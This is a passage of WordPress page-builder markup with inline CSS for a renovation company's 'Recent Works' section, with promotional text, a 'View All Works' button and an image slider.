{\"contentWidth\":\"full_width\",\"blockId\":\"3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8a2535a5-ba23-48dc-aa2f-8d6e2e384f43\"} -->\n<style type=\"text/css\"> .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"9c28eb24-8a51-4aaa-b8b9-2c2b39522605\"} -->\n<style type=\"text/css\"> .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"783eb3b3-d1c3-49b9-90d8-afecee322852\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-783eb3b3-d1c3-49b9-90d8-afecee322852\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\",\"counterId\":\"7fdef199-26ec-46ac-b2e9-e54d01000475\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"5e6e58f8-acdc-4281-9713-b2c98a4e716d\"} -->\n<style type=\"text/css\"> .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5e6e58f8-acdc-4281-9713-b2c98a4e716d\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"ca90f3dd-ac39-45a1-b448-4f4d323edecb\"} -->\n<style type=\"text/css\"> .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"424cb1af-2a1b-4163-a4f3-8d11acf339b8\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading 